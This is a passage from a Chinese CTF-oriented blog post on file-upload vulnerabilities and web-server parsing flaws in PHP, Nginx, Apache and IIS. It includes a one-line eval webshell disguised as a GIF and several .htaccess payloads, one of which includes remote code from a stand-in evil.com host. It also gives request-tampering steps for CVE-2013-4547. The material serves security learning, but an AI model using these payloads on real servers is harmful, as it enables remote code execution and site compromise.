        <span class="title function_">die</span>(<span class="string">&quot;filename cannot be empty!&quot;</span>);
    &#125;
    $extension = <span class="title function_">substr</span>($name, <span class="title function_">strrpos</span>($name, <span class="string">&quot;.&quot;</span>) + <span class="number">1</span>);
    <span class="keyword">if</span> (<span class="title function_">preg_match</span>(<span class="string">&quot;/ph|htaccess/i&quot;</span>, $extension)) &#123;
        <span class="title function_">die</span>(<span class="string">&quot;illegal suffix!&quot;</span>);
    &#125;
    <span class="keyword">if</span> (<span class="title function_">mb_strpos</span>(<span class="title function_">file_get_contents</span>($tmp_name), <span class="string">&quot;&lt;?&quot;</span>) !== <span class="variable constant_">FALSE</span>) &#123;
        <span class="title function_">die</span>(<span class="string">&quot;&amp;lt;? in contents!&quot;</span>);
    &#125;
    $image_type = <span class="title function_">exif_imagetype</span>($tmp_name);
    <span class="keyword">if</span> (!$image_type) &#123;
        <span class="title function_">die</span>(<span class="string">&quot;exif_imagetype:not image!&quot;</span>);
    &#125;
    $upload_file_path = $userdir . <span class="string">&quot;/&quot;</span> . $name;
    <span class="title function_">move_uploaded_file</span>($tmp_name, $upload_file_path);
    echo <span class="string">&quot;Your dir &quot;</span> . $userdir. <span class="string">&#x27; &lt;br&gt;&#x27;</span>;
    echo <span class="string">&#x27;Your files : &lt;br&gt;&#x27;</span>;
    <span class="title function_">var_dump</span>(<span class="title function_">scandir</span>($userdir));
&#125;</code></pre>
<p><strong>绕过技巧</strong>：</p>
<p>1.针对过滤包含<code>ph</code>与<code>htaccess</code>扩展名的文件：上传<code>.user.ini</code>与图片马，利用<code>.user.ini</code>进行文件包含2.针对过滤文件内容包含<code>&lt;?</code>的文件：使用<code>php</code>的脚本标记风格<code>&lt;script language='php'&gt;</code>3.针对使用<code>exif_imagetype</code>规定了必须为图片类型的文件：添加文件头内容或合成图片马（稍后会讲）</p>
<p>首先上传<code>.user.ini</code>文件，文件内容为：</p>
<pre><code class="highlight javascript"><span class="title class_">GIF89</span>a
auto_prepend_file=shell.<span class="property">png</span></code></pre>
<p>然后构造一个<code>shell.png</code>，内容如下：</p>
<pre><code class="highlight javascript"><span class="title class_">GIF89</span>a
&lt;script language=<span class="string">&#x27;php&#x27;</span>&gt; @<span class="built_in">eval</span>($_POST[<span class="string">&#x27;hack&#x27;</span>]); &lt;/script&gt;</code></pre>
<p>然后将两个文件分别上传到服务器上，拿到回显</p>
<h3 id="奇奇怪怪的绕过"><a class="markdownIt-Anchor" href="#奇奇怪怪的绕过"></a> 奇奇怪怪的绕过</h3>
<p>利用一下文件包含上传一个压缩包来getshell</p>
<p>这里不细讲</p>
<h2 id="ngnix解析漏洞"><a class="markdownIt-Anchor" href="#ngnix解析漏洞"></a> Ngnix解析漏洞</h2>
<h3 id="文件解析漏洞"><a class="markdownIt-Anchor" href="#文件解析漏洞"></a> 文件解析漏洞</h3>
<p>对于任意文件名，在后面添加<code>/abc.php</code>(abc为任意字符)后，即可将文件作为php解析</p>
<p><strong>漏洞机理</strong></p>
<p>Nginx配置导致，而非nginx版本问题，而取决于php的配置文件 php.ini 文件中是否开启了<code> cgi.fix_pathinfo</code></p>
<p>当访问<code>xxx.jpg/abc.php</code>时，nginx查看URL后发现以php结尾，并将路径传递给<code>phpfastcgi</code>处理程序，php看到<code>xxx.jpg/abc.php</code>不存在，便删除去最后的<code>/abc.php</code>，看到<code>xxx.jpg</code>存在，而后以<code>php</code>的形式执行<code>xxx.jpg</code>的内容</p>
<p>大概的来说，就是<code>cgi.fix_pathinfo</code>会对形如<code>/1.aaa/2.bbb/3.cccc</code>的文件路径进行处理，若该路径不存在，则会去掉最后的子路径再次判断直到找到一个存在的路径。</p>
<p>若关闭该选项，访问<code>/xxx.jpg/abc.php</code>会返回找不到文件，但关闭该选项可能会导致一些其他错误，所以默认开启。</p>
<p>在高版本中，引入了<code>security.limit_extensions</code>来纠正这个错误，限制了可执行文件的后缀，默认只允许执行<code>.php</code>文件。防止这一问题(回显Access denied)</p>
<h3 id="空字节rce"><a class="markdownIt-Anchor" href="#空字节rce"></a> 空字节RCE</h3>
<p>Nginx在遇到%00空字节时与后段<code>FastCGI</code>处理不一致，导致可以在图中嵌入PHP代码然后通过访问<code>1.jpg%00.php</code>来执行其中的代码。</p>
<p><strong>影响版本</strong></p>
<pre><code class="highlight plaintext">nginx 0.5.*
nginx 0.6.*
nginx 0.7 &lt;= 0.7.65
nginx 0.8 &lt;= 0.8.37</code></pre>
<p>该漏洞不受cgi.fix_pathinfo影响，当为0时，依旧可以解析</p>
<h3 id="cve-2013-45472000"><a class="markdownIt-Anchor" href="#cve-2013-45472000"></a> CVE-2013-4547(%20%00)</h3>
<p><strong>影响版本</strong></p>
<pre><code class="highlight plaintext">nginx 0.8.41 ~ 1.5.6</code></pre>
<p>原理是非法字符空格和截止符（%00）会导致Nginx解析URI时的有限状态机混乱，危害是允许攻击者通过一个非编码空格绕过后缀名限制。是什么意思呢？举个例子，假设服务器上存在文件：“file.jpg ”，注意文件名的最后一个字符是空格。则可以通过访问：<code>http://127.0.0.1/file.jpg \0.php</code></p>
<p>让Nginx认为文件“file.jpg ”的后缀为<code>.php</code></p>
<p>来测试下，这次测试在Nginx/1.0.15中进行。首先准备一张图片，命名为“test.html ”，注意，文件名含有空格。然后在浏览器中访问该文件，会得到一个404，因为浏览器自动将空格编码为%20，服务器中不存在文件“test.html%20”。</p>
<p>测试目标是要让Nginx认为该文件是图片文件并正确地在浏览器中显示出来。我们想要的是未经编码的空格和截止符（\0），怎么办呢？使用Burp Suite抓取浏览器发出的请求包，修改为我们想要的样子，原本的URL是：<code>http://192.168.56.101/test.htmlAAAjpg </code>,将第一个“A”改成“20”（空格符号的ASCII码），将第二个“A”改成“00”（截止符），将第三个“A”改成“2e”（“.”的ASCII码），如图<img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/1964477-20200308194656774-1403436835.png" alt="1964477-20200308194656774-1403436835"></p>
<p>修改完毕后Forward该请求，在浏览器中看到：</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/1964477-20200308194716298-1059932045.png" alt="1964477-20200308194716298-1059932045"></p>
<p>我们已经成功地利用了漏洞！但这有什么用呢？我们想要的是代码被执行。</p>
<p>继续测试，准备文件“test.jpg ”，注意文件名的最后一个字符是空格，上传到服务器。文件内容为：</p>
<pre><code class="highlight php"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">phpinfo</span>(); <span class="meta">?&gt;</span></code></pre>
<p>用Burp Suite抓包并修改，原本的URL是：<code>http://192.168.56.101/test.jpg…php</code> ,将jpg后的第一个“.”改为20，第二个“.”改为00，如下图所示</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/1964477-20200308194746793-602361880.png" alt="1964477-20200308194746793-602361880"></p>
<p>修改完毕后 Forword 该请求，在浏览器中看到：Access denied ，好吧，又是这个。</p>
<p>这说明Nginx在接收到这一请求后，确实把文件“test.jpg ”当做php文件交给php去执行了，只是php看到该文件后缀为“.jpg ”而拒绝执行。这样，便验证了Nginx确实存在该漏洞。但是由于<code>security.limit_extensions</code>的存在，导致我们并不能利用此漏洞</p>
<h2 id="apache解析漏洞"><a class="markdownIt-Anchor" href="#apache解析漏洞"></a> Apache解析漏洞</h2>
<h3 id="文件名解析漏洞"><a class="markdownIt-Anchor" href="#文件名解析漏洞"></a> 文件名解析漏洞</h3>
<p><code>Apache</code>从右向左判断解析文件,若无法解析再继续向左判断,如<code>1.php.owf.rar</code>这个文件名，<code>Apache</code>无法解析<code>.owf</code>和<code>.rar</code>两个后缀，于是继续向前解析将其解析为1.php</p>
<p>实际上许多后缀都可以被解析为php文件进行处理，这里贴一下其他师傅的文章</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250417211410728.png" alt="image-20250417211410728"></p>
<pre><code class="highlight plaintext">原链接:https://www.cnblogs.com/yokan/p/12444476.html
可以用shell.php/x.php/..绕</code></pre>
<h3 id="htaccess文件"><a class="markdownIt-Anchor" href="#htaccess文件"></a> .htaccess文件</h3>
<p>是Apache下的一个配置文件，负责相关目录下的网页配置。通过<code> .htaccess</code>文件，可以实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能IIS平台上不存在该文件，该文件默认开启，启用和关闭在 <code>httpd.conf</code> 文件中配置。</p>
<pre><code class="highlight plaintext">生效前提:
AllowOverride被启用/AllowOverride Options FileInfo
mod_rewrite 模块开启
cgi_module被加载。即apache配置文件中有LoadModule cgi_module modules/mod_cgi.so这么一句且没有被注释</code></pre>
<p>这里放几个常用的配置</p>
<h4 id><a class="markdownIt-Anchor" href="#"></a> </h4>
<pre><code class="highlight plaintext">AddType application/x-httpd-php .jpg</code></pre>
<p>这里代码的意思可以让 .jpg后缀名文件格式的文件名以php格式解析</p>
<h4 id="cgi启动方式利用"><a class="markdownIt-Anchor" href="#cgi启动方式利用"></a> CGI启动方式利用</h4>
<pre><code class="highlight plaintext">Options ExecCGI (表示允许CGI执行，若AllowOverride只有FileInfo权限且本身就开启了ExecCGI的话，就可以不需要这句话了。)
AddHandler cgi-script .xx(将.xx后缀的文件当成CGI程序解析)
#AddHandler application/x-httpd-php .php (给php后缀增加了处理器，这样即使有多个后缀，只要含有php后缀就会被识别为php文件)</code></pre>
<p>下面是网上一个师傅的利用</p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250418083343333.png" alt="image-20250418083343333"></p>
<p><img src="https://kisakiayano.oss-cn-hangzhou.aliyuncs.com/img/image-20250418083404184.png" alt="image-20250418083404184"></p>
<h4 id="fastcgi利用"><a class="markdownIt-Anchor" href="#fastcgi利用"></a> FastCGI利用</h4>
<p>依赖<code>mod_fcgid.so</code>，默认安装包里是没有这个so文件的，但是在PHPstudy的默认配置中是已经加载了的，并且<code>AllowOverrride</code>也是All权限</p>
<pre><code class="highlight plaintext">Options +ExecCGI
AddHandler fcgid-script .gif
FcgidWrapper &quot;/bin/bash&quot; .gif</code></pre>
<h4 id="文件包含利用"><a class="markdownIt-Anchor" href="#文件包含利用"></a> 文件包含利用</h4>
<p><code>php_value auto_prepend_file +文件绝对路径</code>（默认是当前上传的目录）</p>
<p>预先包含我们指定的文件</p>
<pre><code class="highlight plaintext">php_flag allow_url_include 1
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://evil.com/evil-code.txt</code></pre>
<p>如果若我们预先包含.htaccess文件呢?效果是我们插入的恶意代码就会被任意包含</p>
<p>大概像这样构造</p>
<pre><code class="highlight plaintext">php_value auto_prepend_file &quot;.htaccess&quot;%0a#&lt;?php phpinfo();?&gt;</code></pre>
<p>同时这个漏洞也可以造成xss漏洞和其他的一些文件包含漏洞</p>
<h4 id="正经写入"><a class="markdownIt-Anchor" href="#正经写入"></a> 正经写入</h4>
<pre><code class="highlight plaintext">#
&lt;IfModule mime_module&gt;
AddHandler php5-script .gif          #在当前目录下，只针对gif文件会解析成Php代码执行
SetHandler application/x-httpd-php    #在当前目录下，所有文件都会被解析成php代码执行
&lt;/IfModule&gt;

#
&lt;FilesMatch &quot;evil.gif&quot;&gt;
SetHandler application/x-httpd-php   #在当前目录下，如果匹配到evil.gif文件，则被解析成PHP代码执行
AddHandler php5-script .gif          #在当前目录下，如果匹配到evil.gif文件，则被解析成PHP代码执行
&lt;/FilesMatch&gt;
较为精准，不容易误伤
这边看到还有个写法:
&lt;FilesMatch   &quot;shell&quot;&gt; 
SetHandler  application/x-httpd-php 
&lt;/FilesMatch&gt; (意思是把文件名中含shell的都当作php解析，包括还有一个正则的写法)

#
&lt;IfModule mime_module&gt;
AddType application/x-httpd-php .gif (将.gif文件按照php代码进行解析执行)
AddHandler php5-script .jpg	(将.jpg文件按照php代码进行解析执行)
Sethandler application/x-httpd-php (将该目录及子目录下的文件均按照php文件解析执行)
&lt;/IfModule&gt;
容易误伤</code></pre>
<h3 id="cve-2017-15715"><a class="markdownIt-Anchor" href="#cve-2017-15715"></a> CVE-2017-15715</h3>
<p>在文件后缀后加上<code>%0a</code>，绕过getshell</p>
<h3 id="目录遍历"><a class="markdownIt-Anchor" href="#目录遍历"></a> 目录遍历</h3>
<p>配置 <code>Options +Indexes</code> 时Apache存在目录遍历漏洞。</p>
<h3 id="lighttpd"><a class="markdownIt-Anchor" href="#lighttpd"></a> lighttpd</h3>
<p><code>xx.jpg/xx.php</code></p>
<h2 id="iis"><a class="markdownIt-Anchor" href="#iis"></a> IIS</h2>
<h3 id="解析目录解析漏洞testasp1jpg"><a class="markdownIt-Anchor" href="#解析目录解析漏洞testasp1jpg"></a> 解析目录解析漏洞(/test.asp/1.jpg)</h3>
<p>在 IIS5.x/6.0 中，在网站下建立文件夹的名字为<code>*.asp、*.asa、*.cer、*.cdx </code>的文件夹，那么其目录内的任何扩展名的文件都会被IIS当做asp文件来解释并执行。例如创建目录 test.asp，那么 /test.asp/1.jpg 将被当做asp文件来执行。假设黑客可以控制上传文件夹路径，就可以不管上传后你的图片改不改名都能拿shell了</p>
<h3 id="文件名解析漏洞testaspjpg"><a class="markdownIt-Anchor" href="#文件名解析漏洞testaspjpg"></a> 文件名解析漏洞(test.asp;.jpg)</h3>
<p>在 IIS5.x/6.0 中， 分号后面的不被解析，也就是说 xie.asp;.jpg 会被服务器看成是xie.asp。还有IIS6.0默认的可执行文件除了asp还包含这两种 <code>.asa  .cer</code> 。而有些网站对用户上传的文件进行校验，只是校验其后缀名。所以我们只要上传 <code>*.asp;.jpg、*.asa;.jpg、*.cer;.jpg</code> 后缀的文件，就可以通过服务器校验，并且服务器会把它当成asp文件执行。</p>
<h3 id="畸形解析漏洞testjpgphp"><a class="markdownIt-Anchor" href="#畸形解析漏洞testjpgphp"></a> 畸形解析漏洞(test.jpg/*.php)</h3>
<p>微软发布了IIS7.0修补了IIS6.0的解析漏洞，没想到IIS7.0爆出更严重的畸形解析漏洞，于是微软急忙发布了IIS7.5</p>
<p>在 IIS7.0中，在默认Fast-CGI开启状况下，我们往图片里面写入下面的代码</p>
<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/i-beta/1964477/202003/1964477-20200308194604304-1865593941.png"><img src="/2025/01/25/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/kisakiayano/source/_posts/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/1964477-20200308194604304-1865593941.png" alt="img"></a></p>
<p>将文件保存成test.jpg格式，上传到服务器，假设上传路径为/upload，上传成功后，直接访问/upload/test.jpg/x.php，此时神奇的畸形解析开始发挥作用啦。test.jpg将会被服务器当成php文件执行，所以图片里面的代码就会被执行。我们会神奇的发现在 /upload 目录下创建了一个一句话木马文件<code> shell.php</code> 。</p>
<p>临时解决办法：设置<code> cgi.fix_pathinfo</code>为0`</p>
<h3 id="其他解析漏洞"><a class="markdownIt-Anchor" href="#其他解析漏洞"></a> <strong>其他解析漏洞</strong></h3>
<p>在windows环境下，**xx.jpg[**<strong>空格]</strong> 或 <strong>xx.jpg.</strong> 这两类文件都是不允许存在的，若这样命名，windows会默认除去空格或点，黑客可以通过抓包，在文件名后加一个空格或者点绕过黑名单。若上传成功，空格和点都会被windows自动消除。</p>
<p>同时推荐一篇比较有意思的文章，lz自己没怎么看懂，但是感觉蛮有意思的</p>
<p><a target="_blank" rel="noopener" href="https://rivers.chaitin.cn/blog/cqr0pg10lne22g7e74ig">Black Hat USA 2024：利用Apache HTTP服务器中隐藏的语义歧义进行攻击！ | 长亭百川云</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>请我一杯咖啡吧！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.jpg" alt="AyaN0 微信">
        <span>微信</span>
      </div>

  </div>
</div>

          <div class="post-tags">
              <a href="/tags/CTF-Web/" rel="tag"># -CTF -Web</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/01/22/SSTI%E6%BC%8F%E6%B4%9E/" rel="prev" title="SSTI漏洞">
                  <i class="fa fa-angle-left"></i> SSTI漏洞
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/02/10/VNCTF2025/" rel="next" title="VNCTF2025">
                  VNCTF2025 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">AyaN0</span>
  </div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
    <span title="站点总字数">314k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">9:31</span>
  </span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
